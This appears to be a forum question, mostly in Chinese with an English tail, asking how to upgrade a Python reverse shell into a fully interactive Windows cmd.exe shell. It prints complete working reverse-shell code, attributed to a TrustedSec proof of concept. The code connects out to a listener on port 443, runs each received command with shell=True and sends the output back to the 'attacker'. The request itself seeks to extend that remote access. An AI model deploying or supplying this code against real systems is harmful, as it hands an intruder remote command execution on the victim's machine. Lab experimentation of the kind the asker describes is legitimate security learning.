我在 Windows 上玩这个,netcat 在第二个设备上监听:
#!/usr/bin/python
import socket
import subprocess
HOST = '192.168.225.136' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# loop forever
while 1:
# recv command line param
data = s.recv(1024)
# execute command line
proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# grab output from commandline
stdout_value = proc.stdout.read() + proc.stderr.read()
# send back to attacker
s.send(stdout_value)
# quit out afterwards and kill socket
s.close()
来源:https ://www.trustedsec.com/files/RevShell_PoC_v1.py
有没有办法产生一个完全交互式的cmd.exe外壳?我什至无法在time没有锁定的情况下运行该命令,因为它需要输入。任何需要输入的命令只会导致它停止直到^C.
最好有小提示(即C:\>),tab完成,↑</kbd> history, like a proper tty. I've found a few techniques suitable for /bin/sh and /bin/bash on Unix & Linux but nothing so far for Windows cmd.exe.